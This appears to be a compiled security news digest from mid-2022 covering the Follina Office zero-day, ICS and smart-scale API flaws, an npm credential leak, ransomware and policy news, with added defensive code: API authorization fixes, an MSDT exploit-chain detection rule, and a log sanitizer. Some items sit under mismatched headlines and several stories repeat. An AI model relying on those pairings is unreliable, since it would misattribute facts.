Security researchers and Microsoft are warning of a zero-day vulnerability in Office that could allow an attacker to run malicious code on targeted systems. The vulnerability, tracked as CVE-2022-30190, exists in Microsoft Word’s remote templating feature, unlike traditional Office vulnerabilities that rely on macros. If successful, an attacker could load malware onto targeted machines from remote servers while bypassing Microsoft Defender’s anti-virus scanner. This issue affects every version of Microsoft Office currently receiving updates, with some affected versions dating back to 2003. Although no patch was available as of Tuesday, Microsoft did publish remediation guidelines to keep the vulnerability from being exploited.
Read more in
- Zero-Day ‘Follina’ Bug Lays Microsoft Office Open to Attack
- Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
Cisco Talos recently discovered eight vulnerabilities in the Open Automation Software Platform that could allow an adversary to carry out a variety of malicious actions, including improperly authenticating into the targeted device and causing a denial of service. The OAS Platform facilitates the simplified data transfer between various proprietary devices and applications, including software and hardware. The most serious of these issues is TALOS-2022-1493 (CVE-2022-26082), which an attacker could exploit to gain the ability to execute arbitrary code on the targeted machine. This issue has a severity score of 9.1 out of a possible 10. Another vulnerability, TALOS-2022-1513 (CVE-2022-26833) has a 9.4 severity score and could lead to the unauthenticated use of the REST API.
Read more in
- Vulnerability Spotlight: Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
Vulnerability: OAS platform vulnerable to critical RCE and API access flaw
Bleeping Computer has featured news of a pair of vulnerabilities in the widely used Open Automation Software (OAS) platform. The OAS platform is a popular data connectivity platform used in industrial control systems, and it allows inter-operation between a wide range of devices and protocols.
The first vulnerability is a critical RCE flaw that could have potentially compromised the whole platform: an API endpoint allowed remote administration of the platform. The researchers discovered that they were able to access the endpoint in question with a blank username and password, allowing arbitrary remote access to the platform. The issue has a CVSS rating of 9.4 and is tracked as CVE-2022-26833. This is an example of API2:2019 — Broken authentication.
The second vulnerability is due to a lack of authentication at an API endpoint and relates to a file write vulnerability in the platform’s secure file transfer module. The researchers found that they could send specially crafted requests to an API endpoint that allowed them to upload arbitrary files, including a new authorized_keys file in the root user’s SSH directory, which in turn allowed full remote access. The issue has a CVSS rating of 9.1 and is tracked as CVE-2022-26082.
The vulnerabilities were disclosed responsibly and have been fixed in version 16.00.0.113, released on 22 May 2022. The researchers recommend either upgrading to the latest version of the platform, or explicitly deactivating the impacted service endpoints.
Vulnerability: Mass account takeover in Yunmai smart scale API
The second vulnerability this week comes from the security team at Fortbridge who discovered a range of vulnerabilities in the API of the Yunmai smart scale.
The researchers performed a penetration test on both Android and iOS versions of the smart scale app and discovered four vulnerabilities relating to the backend API. By combining these vulnerabilities, they successfully executed a mass account takeover. The vulnerabilities were responsibly disclosed to the vendor, but it is unclear if the issues have been resolved at the time of writing.
The first vulnerability allowed attackers to bypass the limit on the number of family members per account. The app only allows creating 16 accounts in a family, but using the API directly did not enforce any limit. The root cause is that the limit was enforced only client side, not in the backend API. This is a common application design flaw — always ensure restrictions and limits are enforced in the backend API.
The second vulnerability allowed arbitrary enumeration of user IDs by guessing IDs using Burp Suite automation. The API did not adequately authorize access to the guessed ID, instead returning full user information, including sensitive PII. This is an example of API1:2019 — Broken object-level authorization — remember to always fully authorize access to objects against the object owner.
The third vulnerability is an example of API2:2019 — Broken authentication, allowing the researchers to add and delete users from other people’s accounts using the ability to enumerate user IDs. Always ensure all API endpoints are authenticated.
The fourth vulnerability allowed the researchers to gain access to both the refresh token and access token when creating new users. By inspecting the response in Burp Suite, the researchers found that these tokens were accidentally leaked in the response body, as shown in their write-up.
Armed with this combination of tokens, attackers were effectively granted access to the platform for perpetuity. This is an example of API3:2019 — Excessive data exposure — always be wary of leaking information, particularly access tokens.
For the coup de grâce, the researchers were able to combine three of the vulnerabilities to perform mass account takeover attacks using the forgotten password flow.
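The backend-side fixes for the flaws described above, as an added example with constructed data (not the vendor’s code or Fortbridge’s): the family-size cap is enforced in the API rather than the app, object-level authorization is checked against the caller’s family before any record is returned, and the create-user response is built from an allow-list so tokens never leak.

```python
"""Server-side enforcement for the three API flaws discussed above.
Added example; the data model, field names and limits are constructed."""
import secrets
from dataclasses import dataclass, field

MAX_FAMILY_MEMBERS = 16  # the cap the mobile app enforced only client-side


class ApiError(Exception):
    """Error the API layer maps to an HTTP status code."""

    def __init__(self, status: int, message: str):
        super().__init__(message)
        self.status = status


@dataclass
class User:
    user_id: int
    family_id: int
    email: str
    weight_kg: float
    # Tokens live only server-side; no serializer below ever copies them out.
    refresh_token: str = field(default_factory=lambda: secrets.token_hex(16))
    access_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Store:
    """In-memory stand-in for the backend database (constructed)."""
    users: dict = field(default_factory=dict)
    next_id: int = 1

    def add(self, family_id: int, email: str, weight_kg: float) -> User:
        user = User(self.next_id, family_id, email, weight_kg)
        self.users[user.user_id] = user
        self.next_id += 1
        return user

    def family_members(self, family_id: int) -> list:
        return [u for u in self.users.values() if u.family_id == family_id]


def public_view(user: User) -> dict:
    """Allow-list serializer: only what a client needs (fixes the token leak,
    OWASP API3:2019 Excessive data exposure)."""
    return {"user_id": user.user_id, "family_id": user.family_id, "email": user.email}


def create_family_member(store: Store, caller: User, email: str, weight_kg: float) -> dict:
    """The limit is checked here, in the backend, so calling the API directly
    cannot bypass it; the response never carries the new user's tokens."""
    if len(store.family_members(caller.family_id)) >= MAX_FAMILY_MEMBERS:
        raise ApiError(403, "family member limit reached")
    return public_view(store.add(caller.family_id, email, weight_kg))


def _authorize_member(store: Store, caller: User, user_id: int) -> User:
    """Object-level authorization (API1:2019): the target must belong to the
    caller's family. Unknown and foreign IDs yield the same 404, so the
    endpoint cannot be used to enumerate valid user IDs."""
    target = store.users.get(user_id)
    if target is None or target.family_id != caller.family_id:
        raise ApiError(404, "not found")
    return target


def get_user(store: Store, caller: User, user_id: int) -> dict:
    """Returns profile data only after the ownership check passes."""
    target = _authorize_member(store, caller, user_id)
    return {**public_view(target), "weight_kg": target.weight_kg}


def delete_user(store: Store, caller: User, user_id: int) -> None:
    """Removing a member requires an authenticated caller (API2:2019) who owns
    the target (API1:2019); the same check as for reads."""
    target = _authorize_member(store, caller, user_id)
    del store.users[target.user_id]
```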
Clop Ramps Up
The Clop ransomware group suddenly added 21 new victims on their data leak site after being quiet from November through to February.
Universities Put On Watch
The FBI has warned the US education sector that college and university credentials are being offered for sale on criminal marketplaces. University attacks are already fairly common, so we don’t think this alert is all that useful, but perhaps it explains why they are so common.
Arrested REvil Members Will Skate
Russian media reports the prosecution of REvil suspects arrested in January has stalled, with Russian prosecutors not receiving the material they need to press ahead from US law enforcement officials. CyberScoop has English-language coverage, which suggests that this may not indicate broader Russian policy but simply reflects the facts on the ground. Cyber security cooperation just stopped after the invasion of Ukraine. Regardless, we won’t look to Russian law enforcement efforts to solve problems with ransomware.
Indian low-cost airline SpiceJet was affected by an “attempted ransomware attack” that left some passengers stranded for hours, including many actually stuck on planes.
The interesting thing is that passengers trapped on planes that can’t take off are tweeting from the runway. They are directly engaging and putting pressure on the company. This is an interesting dynamic that hasn’t been explored in cyber extortion. It opens new perspectives on possible ways to force a company to pay a ransom.
Oh. Great. A new way for ransomware crews to ratchet up the pressure.
A Microsoft Office 0day, which takes advantage of the Microsoft Support Diagnostic Tool (MSDT), is being actively exploited. Microsoft Word’s remote template feature can be used to load HTML, which then calls MSDT to execute PowerShell.
Exploitation in the wild dates back to April. This week Proofpoint reported a group linked to Chinese state interests is using it to target the international Tibetan community, and the ACSC says it is being used to target Australian organisations.
Kevin Beaumont has, as usual, been doing a bang-up job collating new information as it comes to light and also keeping Microsoft honest by pointing out its sometimes inconsistent behaviour.
Beaumont notes, for example, that Microsoft initially said the bug was “not a security related issue,” and also managed to recently fix very similar bugs in Teams but not Office. (He dubbed the bug Follina, btw, because the sample he had included the string “0438”, the area code of Follina in Italy.)
Microsoft has issued guidance that recommends disabling the MSDT URL protocol, but a patch is not yet available at the time of writing.
60 million wins
Microsoft has announced plans to apply sensible security defaults to Azure customers who haven’t applied them already. These defaults were introduced for new tenants in October 2019, but previous customers remained unprotected unless they explicitly enabled the features. Some interesting stats: This move will bring MFA to another 60 million accounts, and organisations with these protections experience 80% less compromise than the overall tenant population.
SilverTerrier Head Arrested
On Wednesday, INTERPOL announced the Nigeria Police Force cybercrime unit had arrested a 37-year-old Nigerian man who is alleged to have run a Business Email Compromise gang, dubbed SilverTerrier by Palo Alto Networks. Interpol was assisted by a smattering of cyber security companies, including Palo Alto Networks, Group-IB, and Trend Micro.
A Minister for Cyber Security!
The recently elected Australian government appointed the Hon Clare O’Neil MP to a new Cabinet-level Minister for Cyber Security position. This is a vast improvement over the previous arrangement, where no government minister had “cyber security” in their job title. We do worry, however, about how much bandwidth O’Neil will be able to dedicate to the role, as she is also Minister for Home Affairs.
Chinese Open Source is Not that Open
Gitee, a Chinese version of Github, has started to manually review code before it is made publicly available, with the MIT Technology Review reporting the company stating “it didn’t have a choice”. The suspicion, naturally enough, is that Gitee has fallen afoul of the Chinese government’s need to censor information.
These types of companies are strategically important for both companies and countries. Microsoft spent USD$7.5bn to acquire GitHub, and the PRC government is likely concerned about its developers’ dependence on the platform. Making Gitee much harder to use won’t help it grow, though.
Russia orders Google to remove Tor Browser from Russian Play Store
Roskomnadzor, Russia’s telecommunications watchdog, has ordered Google to remove the Tor Browser Android app from the Russian version of the Play Store, the agency said in a message posted on its official Telegram channel on Tuesday.
The agency said that the Tor Browser allows users to access the Tor network, which it had previously ruled contains “content prohibited in Russia.”
Yesterday’s decision comes after Roskomnadzor previously ordered Russian internet service providers (ISPs) to block access to the Tor network and its official website in December 2021.
While the Tor Project is currently fighting last year’s ruling in a Moscow court, arguing that the ban was issued without giving Tor representatives an opportunity to participate and hence broke Russian law, the writing is already on the wall.
Coupled with another December 2021 decision to block access to half-a-dozen popular VPN services and with recent rumors that ISPs are testing blocks of several VPN protocols at the lowest level, it is very apparent that Roskomnadzor is on a crusade to limit Russians’ access to censorship-evading tools.
Unless you’ve been living under a rock for the past three months, Roskomnadzor’s actions are driven by the Russian state’s need to control its online space and what information Russians can access online during its illegal and genocide-abundant invasion of Ukraine. Since February 24, when Russian troops officially crossed the border into Ukraine, Roskomnadzor has banned access to foreign news websites that report on the invasion and don’t toe its state-mandated propaganda “denazification” line or websites for western companies that have pulled out of Russia as a sign of protest or because of sanctions.
Roskomnadzor’s decision to go after the Tor Project makes sense, since Russia is the country with the second-most users on the Tor network, with more than 300,000 daily users, or 15% of all Tor users, the Tor Project said last year.
Mirror Protocol hack #1
A threat actor exploited a bug in the Mirror Protocol DeFi platform to steal almost $90 million worth of cryptocurrency in October 2021. The hack exploited a vulnerability in one of the Mirror Protocol’s smart contract mechanisms that allowed the attacker to generate large sums of cryptocurrency via blockchain betting transactions. The incident went completely undetected for almost seven months until last week, when a Twitter user discovered the vulnerability and its aftermath.
Mirror Protocol hack #2
…and then the same person who found the first attack found a second one.
Portland falls to BEC
The US city of Portland, Oregon, said it lost $1.4 million to a BEC scammer last month, in April 2022. In a press release last week, city officials said they identified that they sent city funds to the wrong bank account after the threat actor attempted to scam the city a second time.
Reuters is reporting on a court case where independent journalist Scott Stedman testified that Israeli jailed private detective Aviram Azari worked to hire Indian hackers to carry out espionage operations on behalf of several Russian oligarchs. Azari pleaded guilty last month to working for BellTroX, a New Delhi-based hacker-for-hire company.
AON, one of the largest providers of insurance, pension administration, and health insurance plans, has disclosed a security breach [PDF]. The company said in February this year, it found that a threat actor accessed some of its servers several times between December 29, 2020, and February 26, 2022, from where it downloaded documents containing sensitive data on some of its customers. AON did not say how many customers had data exposed in the incident.
365 Data Centers lawsuit
365 Data Centers, a major data center operator on the US East Coast, was sued last week by one of its customers after a ransomware attack appears to have permanently destroyed some of its customers’ data. The incident took place on May 14, and the data center operator has yet to publicly acknowledge it beyond some private emails sent to its customers. Plaintiffs in the class-action lawsuit claim they have suffered “damages amounting to hundreds of thousands, if not millions, of dollars in lost revenue and profit.”
Chinese FOSS censorship
Thousands of Chinese developers complained last month that Gitee—a Chinese version of the GitHub platform—has started censoring open-source projects they were hosting on the platform. According to MIT Technology Review, developers said they had projects locked or hidden from view. Responding to user criticism, Gitee said in a statement posted earlier this month that, going forward, all code posted on the platform will need to be manually reviewed before being published. The company didn’t confirm it was implementing this manual review process at the request of the Chinese government, but let’s face it, who else has the desire and power to force Gitee to do this?
Microsoft launched on Tuesday a new product called Microsoft Entra. According to the company, the Entra product family will include all of Microsoft’s identity and access services, such as Microsoft Azure Active Directory (Azure AD), as well as two new product categories: Cloud Infrastructure Entitlement Management (CIEM) and decentralized identity.
Google has open-sourced PSP, a security protocol that uses cryptography to offload and distribute traffic across multiple servers and which Google has used internally for its intra- and inter-data center traffic. The GitHub repo is here, and below is a Twitter thread from an AWS exec discussing Google’s technical design.
Ukrainian BGP hijack
Qrator Lab, a Russia-based DDoS mitigation provider, disclosed today that Lurenet, a Ukraine-based internet service provider, has hijacked BGP routes for several Russian companies at the start of March, after Russia’s invasion of Ukraine, and in April. The company told Russian news outlet Vedomosti that Lurenet hijacked traffic for Beeline, Megafon, and MTS, three Russian telcos.
Romanian lawmakers have proposed a new bill this week that would make the Romanian Intelligence Service (SRI) the official telecommunications interception agency. The new bill will also grant the agency the right to operate internationally, would force local companies and Romanian citizens to cooperate with its investigations, and introduce special rules for investigating SRI agents.
New HelloXD ransomware
Security researcher MalwareHunter has spotted a new ransomware strain in the wild, named HelloXD, that targets VMWare ESXi servers.
Android malware ecosystem
According to the ThreatFabric Mobile Threat Landscape for H1 2022, the operators of mobile banking trojans are switching their focus from Account Take-Over (ATO) attacks to adding more On-Device Fraud (ODF) capability to their malware toolkits. Android banking trojans that support ODF features include strains like Alien, Anatsa, Medusa, Hydra, Exo/Octo, Gustuff, and SharkBot.
Interpol reported on Monday that Nigerian law enforcement arrested three locals on charges of cybercrime. Officials said the suspects distributed the Agent Tesla remote access trojan. Once they infected victims, the group would engage in business email compromise (BEC) schemes. Their campaigns primarily targeted corporate organizations, such as oil and gas companies in South East Asia, the Middle East, and North Africa.
The FBI has warned US organizations about a rise in fraudulent schemes seeking donations or other financial assistance related to the crisis in Ukraine. The Bureau says that criminal actors are taking advantage of the war in Ukraine by posing as Ukrainian entities needing humanitarian aid or developing fundraising efforts, including monetary and cryptocurrency donations.
Check Point published a technical report on XLoader, an infostealer malware and the successor of the Formbook malware, abandoned last year.
OALABS has published a report on Amadey Loader, a malware loader botnet that was first seen in 2018 and is currently being advertised on Russian-speaking cybercrime forums.
Security researcher Mohamed Ashraf has published a deep dive into the Mars Stealer malware.
Cybersecurity firm Proofpoint said on Tuesday that it discovered that at least one state-sponsored group has already weaponized the recent Office zero-day that was disclosed over the weekend. Per the company, a threat actor tracked as TA413 (or Keyboy) has used this technique to target individuals in the Tibet region.
Office zero-day mitigation
Finnish security researcher Valtteri Lehtinen released a new tool called UPnProxyChain. The tool creates a network of SOCKS proxy servers out of devices vulnerable to the UPnProxy vulnerability [PDF].
Microsoft Office Zero-Day Vulnerability
A zero-day vulnerability in Microsoft Office can be exploited to allow arbitrary code execution. According to “nao_sec,” the Japanese research team that detected the issue, the flaw “uses Word’s external link to load the HTML and then uses the ‘ms-msdt’ scheme to execute PowerShell code.” The flaw, dubbed Follina, can be exploited even when macros are disabled in Microsoft Word.
- This is a significant vulnerability and underscores problems that likely exist in other protocol handlers (there are many). You can disable troubleshooting tools entirely by entering the following command, which mitigates the current attack:
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics" /t REG_DWORD /v EnableDiagnostics /d 0
I’m doing an emergency webcast this Tuesday (today) at 5pm ET to discuss additional mitigations, detections, and just more information about the vulnerability itself. In the meantime, I’ve written a pretty in-depth blog on the topic here (including detection engineering): https://www.scythe.io/library/breaking-follina-msdt-vulnerability
- Microsoft assigned this vulnerability an “important” rating. However, this does not properly reflect the impact this vulnerability may have. Even with current countermeasures (for example, prompts to enable macros), malicious documents are very commonly used to gain access to networks for ransomware and other malware. This vulnerability bypasses all these protections, and all it takes is opening or even just previewing an Office document. While reasonable workarounds are available, a push to educate users should be included in your response.
- Practitioner’s note: With no patch available, the ISC offers (among other mitigations) that administrators can remove the ms-msdt:// URI scheme. This lives in HKEY_CLASSES_ROOT\ms-msdt in the registry and can be removed via Group Policy Object (GPO) or with PowerShell:
Remove-Item -Path Registry::HKEY_CLASSES_ROOT\ms-msdt\ -Recurse -Force
- Microsoft has issued an advisory with some workarounds outlined in it [https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/]. The recommendation from Microsoft is to disable the MSDT URL Protocol; however, be aware that some applications may not work as expected once this is implemented. Should this happen, you can always re-enable the MSDT URL Protocol on affected computers.
- Word’s protected mode does kick in and offers some protection, but if the malicious document is saved as an RTF it can be executed via the document preview tab in Explorer, bypassing protected mode. The attack appears not to work on the Insider and Current versions of Office; your defense is going to be making sure that your systems running Office are kept updated.
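To complement the registry workarounds above with detection, here is an added example (not from any of the linked posts) that runs two rules over constructed process-creation events: an Office binary spawning msdt.exe, and any command line carrying the ms-msdt: scheme. The Sysmon-like field names and the sample events are assumptions.

```python
"""Detection logic for the Office-to-MSDT chain described above.
Added example; events are constructed, not real telemetry."""

# Office applications that should never launch the diagnostic tool
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# The MSDT URI scheme the Follina documents abuse
MSDT_SCHEME = "ms-msdt:"

# Constructed sample events: event id, parent image, image, command line
SAMPLE_EVENTS = [
    # benign: user opens a document
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\u\\invoice.docx"'},
    # suspicious: Word spawns msdt.exe with the URI scheme on its command line
    {"id": 2, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": '"msdt.exe" ms-msdt:/id ConstructedDiagnostic'},
    # benign: an administrator runs a troubleshooter from a shell
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": '"msdt.exe" /id ConstructedDiagnostic'},
    # suspicious: scheme invoked from a non-Office parent (constructed), so
    # only the command-line rule catches it
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": '"msdt.exe" ms-msdt:/id ConstructedDiagnostic'},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of the rules an event matches (empty if benign)."""
    hits = []
    parent, image = basename(event["parent"]), basename(event["image"])
    # Rule 1: process-tree anomaly independent of the command line
    if parent in OFFICE_PARENTS and image == "msdt.exe":
        hits.append("office_spawns_msdt")
    # Rule 2: the abused scheme anywhere on the command line
    if MSDT_SCHEME in event["cmdline"].lower():
        hits.append("msdt_uri_scheme")
    return hits


def detect(events) -> list:
    """Alerts for every event that matched at least one rule, in input order."""
    alerts = []
    for event in events:
        rules = evaluate(event)
        if rules:
            alerts.append({"id": event["id"], "rules": rules})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```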
Read more in
- New Microsoft Office Attack Vector via “ms-msdt” Protocol Scheme (CVE-2022-30190)
- Follina — a Microsoft Office code execution vulnerability
- Document Exploiting New Microsoft Office Zero-Day Seen in the Wild
- Zero-Day ‘Follina’ Bug Lays Older Microsoft Office Versions Open to Attack
- Microsoft Office: Attackers Injecting Code via Zero-Day Bug
- Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild
- Zero-day vuln in Microsoft Office: ‘Follina’ will work even when macros are disabled
- New Microsoft Office zero-day used in attacks to execute PowerShell
GitHub Details npm Account Information Stolen in April
GitHub says that access credentials for about 100,000 npm accounts were stolen earlier this year. The breach was conducted with the use of stolen OAuth tokens. GitHub initially disclosed the breach in mid-April. Last week, GitHub Senior Director for Product Security Engineering Greg Ose said the intruders stole approximately 100k npm usernames, password hashes, and email addresses from a 2015 archive of user information; all private package manifests and metadata as of April 7, 2021; names and the semVer of published versions of all private packages as of April 10, 2022; and private packages from two organizations.
The investigation into the OAuth compromise found an unrelated exposure: some npm service logs stored in GitHub’s internal logging system contained plaintext credentials received in requests to npm services that should have been sanitized. This kind of “exposure hunting” is a good thing to do regularly, but taking advantage of a breach investigation to do so is a no-brainer.
Plaintext passwords in logs are something we should all be making sure we don’t capture, apart from the case of a user who puts their password into the username prompt. Like GitHub, if you discover passwords captured in logs, contact those account holders directly and have them change their passwords _AFTER_ you make sure that you won’t continue to capture plaintext passwords. This would be a good time to make sure users are enabling MFA. If you’re concerned about your account being among the ones which were captured, change the password and verify 2FA is in place.
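The two halves of that advice, sanitizing what reaches the log and hunting for what already got through, as an added example (not GitHub’s code) over constructed JSON request-log lines; the field names and the log format are assumptions.

```python
"""Request-log sanitizer plus an exposure hunt over stored log lines.
Added example; log lines, paths and field names are constructed."""
import json
import re

# Field names whose values are credentials and must never reach the log
SECRET_FIELDS = {"password", "passwd", "pwd", "token", "refresh_token", "secret"}
# Authorization values: keep the scheme for debugging, drop the credential
AUTH_HEADER_RE = re.compile(r"^(basic|bearer)\s+\S+", re.IGNORECASE)
REDACTED = "[REDACTED]"

# Constructed sample log lines (JSON per line; one malformed line on purpose)
SAMPLE_LOG = [
    '{"path": "/login", "body": {"name": "alice", "password": "hunter2"}}',
    '{"path": "/whoami", "headers": {"Authorization": "Bearer constructed-token"}}',
    '{"path": "/packages", "headers": {"Accept": "application/json"}}',
    "not json at all",
]


def sanitize(obj):
    """Recursively redact credential fields and Authorization header values
    before a request record is written to the log."""
    if isinstance(obj, dict):
        out = {}
        for key, value in obj.items():
            k = key.lower()
            if k in SECRET_FIELDS:
                out[key] = REDACTED
            elif k == "authorization" and isinstance(value, str):
                out[key] = AUTH_HEADER_RE.sub(lambda m: m.group(1) + " " + REDACTED, value)
            else:
                out[key] = sanitize(value)
        return out
    if isinstance(obj, list):
        return [sanitize(v) for v in obj]
    return obj


def sanitize_lines(lines) -> list:
    """Apply sanitize() to each JSON line; non-JSON lines pass through unchanged."""
    out = []
    for line in lines:
        try:
            out.append(json.dumps(sanitize(json.loads(line))))
        except json.JSONDecodeError:
            out.append(line)
    return out


def _secret_paths(obj, prefix=""):
    """Yield dotted paths of unredacted credentials inside a parsed record."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            path = f"{prefix}{key}"
            k = key.lower()
            if k in SECRET_FIELDS and value != REDACTED:
                yield path
            elif (k == "authorization" and isinstance(value, str)
                  and AUTH_HEADER_RE.match(value) and REDACTED not in value):
                yield path
            else:
                yield from _secret_paths(value, path + ".")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from _secret_paths(value, f"{prefix}{i}.")


def find_exposures(lines) -> list:
    """Exposure hunt over already-written log lines: returns (line number,
    dotted path) for every credential that got through. This matches by field
    name, so a password a user typed into the username prompt is not found
    this way, which is why the hunt is paired with notifying affected users."""
    found = []
    for number, line in enumerate(lines, start=1):
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        found.extend((number, path) for path in _secret_paths(record))
    return found


if __name__ == "__main__":
    print(find_exposures(SAMPLE_LOG))
    print(find_exposures(sanitize_lines(SAMPLE_LOG)))
```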
Read more in
- GitHub saved plaintext passwords of npm users in log files, post mortem reveals
- GitHub: Attackers stole login details of 100K npm user accounts
Microsoft Rolling Out Security Defaults
Microsoft plans to roll out security defaults to Azure Active Directory users who have not yet enabled security defaults or Azure AD Conditional Access. Microsoft Director of Identity Security Alex Weinert notes that “When we look at hacked accounts, more than 99.9% don’t have MFA.” Microsoft introduced security defaults for new tenants in October 2019. Microsoft estimates the rollout will protect an additional 60 million accounts.
- There are basic security hygiene concepts that ought to be like fluoride in public water – they should be the default for all services and should be implemented to be transparent and unalterable, providing a base level of protection. The 2% of use cases that need something different can be handled by exception, rather than allowing the 98% of use cases to be put at risk because defaults were left unchanged. The users (even developers) are getting used to accepting this – take advantage.
- There are times when leaving security to the customer to (finally) implement is as good as never implementing it. All service providers need not only to continue to raise the security bar commensurate with the current threat landscape, but also to ensure customers are notified of and implement those improvements. Microsoft’s conditional access allows you to have different security settings for trusted and untrusted devices and networks. You can enable the security defaults in the Microsoft 365 admin center.
Read more in
- Raising the Baseline Security for all Organizations in the World
- Microsoft to roll out security defaults to millions more worldwide
- Microsoft is rolling out these security settings to protect millions of accounts. Here’s what’s changing
Commerce Publishes Final Rule on Cybersecurity Tools Export Controls
The US Department of Commerce’s Bureau of Industry and Security has published a final cybersecurity export control rule in the Federal Register. The new rule is aimed at preventing the resale or export of certain cybersecurity tools to countries like Russia and China without a license. The rule took effect on May 26, 2022.
- This aligns the US with the other 42 members of the Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies. The latest revisions incorporate feedback provided on the October 2021 proposed rule. Essentially, items under this rule must have proper licensing through the Department of Commerce before they can be used outside the country.
- This is mostly of interest to vendors selling products, but if you are using any of the tools on the list, it is worth checking for any potential spillover impact on your company’s global use of such products.
Read more in
- Information Security Controls: Cybersecurity Items
- Commerce Dept. Issues Rule to Restrict Cyber Hacking Tools
FBI Warns Criminals are Selling University Credentials
The FBI has published a TLP: White level Private Industry Notification warning that network access credentials for US colleges and universities are being sold in online criminal marketplaces. The FBI recommends that academic institutions take steps to improve their networks’ security, including keeping software up to date, implementing lockout rules for multiple password attempts, and requiring multi-factor authentication.
- While university network and student support services can be challenging, the recommended actions are doable. Make sure that you are segmenting (particularly research and back-end IT), monitoring, and aware of which services are exposed to the Internet. Seriously block SMB, RDP, FTP and other insecure protocols. Be aware of trust relationships; establish a process for these connections and verify that they remain appropriately secure. When looking at MFA, look to phishing-resistant options.
- If you have any collaborative agreements with universities that involve VPN access, it is a good idea to investigate the impact.
Read more in
- Compromised US Academic Credentials Identified Across Various Public and Dark Web Forums (PDF)
- FBI warns colleges VPN credentials circulating on Russian forums
- FBI Warns About Hackers Selling VPN Credentials for U.S. College Networks
Talos List of Open Automation Software Vulnerabilities
Researchers from Cisco Talos recently discovered eight vulnerabilities in the Open Automation Software (OAS) Platform. The flaws could be exploited to execute arbitrary code, allow unauthenticated use of the REST API, and conduct other malicious activity. OAS has released an update to address the vulnerabilities.
- OAS is often used for data transfer in OT/ICS and IIoT environments. The flaws have CVSS scores in the 9.1-9.4 range and can be used to conduct DoS attacks, enumerate username/password pairs, achieve RCE, and cause other mischief. If you’ve got it in your environment, make sure you apply the update. If it’s bundled with a larger package, get your vendor’s update plans. Also make sure that you’re following hardening guidelines, particularly segmentation and monitoring of connections to administration services and ports.
Read more in
- Vulnerability Spotlight: Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
- Talos names eight deadly sins in widely used industrial software
- Critical OAS Bugs Open Industrial Systems to Takeover
- Critical Flaws in Popular ICS Platform Can Trigger RCE
Italy’s CSIRT Warns of Potential DDoS Attacks
An alert from Italy’s Computer Security Incident Response Team (CSIRT) warns that there is a high risk of distributed denial-of-service (DDoS) attacks on national computer systems. The alert notes that “There continue to be signs and threats of possible imminent attacks against, in particular, national public entities, private entities providing a public utility service or private entities whose image is identified with the country of Italy.”
- “ChromeLoader” uses PowerShell on Windows and a Bash script on the Mac, and is distributed via an ISO claiming to be a hacked game image. The loader is used to install a browser plugin. Consider blocking or otherwise limiting use of ISOs downloaded from the Internet.
Read more in
More Pushback Against CERT-In Breach Reporting Requirements
Nearly a dozen technology-related lobby groups have written to India’s Computer Emergency Response Team (CERT-In) to voice their objection to the organization’s new breach reporting requirements. The groups include the US Chamber of Commerce, The Alliance (BSA), Digital Europe, the Information Technology Industry Council, techUK, the Cybersecurity Coalition US Chamber of Commerce, the US-India Business Council, and the US-India Strategic Partnership Forum. The groups object to numerous requirements, including the six-hour breach reporting rule and the burden and risk of storing customer data.
- The objections highlight important factors to consider when implementing incident reporting: make sure the reporting requirement is attainable; understand how data is protected and what data is required, some of which may necessitate updated NDAs; and ensure that you can use machine-based reporting tools that let you leverage existing systems and processes.